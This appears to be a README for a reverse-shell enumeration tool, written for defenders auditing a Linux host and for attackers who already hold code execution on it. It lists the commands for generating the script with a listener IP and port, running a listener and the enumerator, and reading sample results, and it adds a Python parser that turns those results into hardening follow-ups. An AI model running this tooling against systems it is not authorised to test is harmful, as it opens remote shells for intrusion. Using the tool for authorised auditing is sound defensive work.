Why?
You're a defender who wants to audit which reverse shells work out of the box on a particular host. Or you're a lazy attacker who wants to quickly determine which reverse shells will work.
When?
You have remote code execution on a Linux host, and the noise this enumeration generates is not an operational concern.
How?
- Clone the repo:
  ```bash
  git clone https://github.com/fx2301/reverseshellenum.git
  cd reverseshellenum
  ```
- Generate yourself a fresh script:
  ```bash
  LHOST="10.10.0.123" LPORT=31373 python3 generate.py
  ```
- Run the listener:
  ```bash
  ./listen.sh
  ```
- Run the reverse shell enumerator on the target host:
  ```bash
  ./reverseshellenum.sh
  ```
- Observe which shells work (refer to shells.json):
  ```
  $ ./listen.sh
  [i] Starting Reverse Shell Audit
  [+] Success: Bash -i
  [+] Success: Bash 196
  [+] Success: Bash read line
  [+] Success: Bash 5
  [+] Success: ncat -e
  [+] Success: Perl
  [+] Success: Perl no sh
  [+] Success: PHP Emoji
  [i] Ending Reverse Shell Audit
  ```
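For the defender's audit, the listener transcript can be condensed into a per-tool summary to drive hardening follow-up. The script below is an added example, not part of reverseshellenum; it assumes the `[+] Success:` line format shown above and that the first word of each shell name identifies the binary involved.

```python
import re
from collections import defaultdict

# Constructed sample: a copy of the listener transcript shown above.
SAMPLE = """\
[i] Starting Reverse Shell Audit
[+] Success: Bash -i
[+] Success: Bash 196
[+] Success: Bash read line
[+] Success: Bash 5
[+] Success: ncat -e
[+] Success: Perl
[+] Success: Perl no sh
[+] Success: PHP Emoji
[i] Ending Reverse Shell Audit
"""

SUCCESS = re.compile(r"^\[\+\] Success: (?P<name>.+?)\s*$")

def summarize(transcript):
    """Group successful shells by the tool named first in each entry.

    Assumption: the first word of a shell name identifies the binary
    (e.g. "Perl no sh" -> perl). Returns (groups, complete); complete
    is False when the start or end marker is missing, which means the
    audit was interrupted and the list may be partial.
    """
    groups = defaultdict(list)
    started = ended = False
    for line in transcript.splitlines():
        line = line.strip()
        if line == "[i] Starting Reverse Shell Audit":
            started = True
        elif line == "[i] Ending Reverse Shell Audit":
            ended = True
        elif (m := SUCCESS.match(line)) and started and not ended:
            name = m.group("name")
            groups[name.split()[0].lower()].append(name)
    return dict(groups), started and ended

if __name__ == "__main__":
    groups, complete = summarize(SAMPLE)
    if not complete:
        print("[!] transcript incomplete; results may be partial")
    # Tools with the most working variants first.
    for tool, names in sorted(groups.items(), key=lambda kv: -len(kv[1])):
        print(f"{tool:6} {len(names)} working: {', '.join(names)}")
```

Each tool in the summary is a candidate for removal, execution restrictions, or egress filtering on that host.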
PRs welcome! Kudos to revshells.com for the raw material.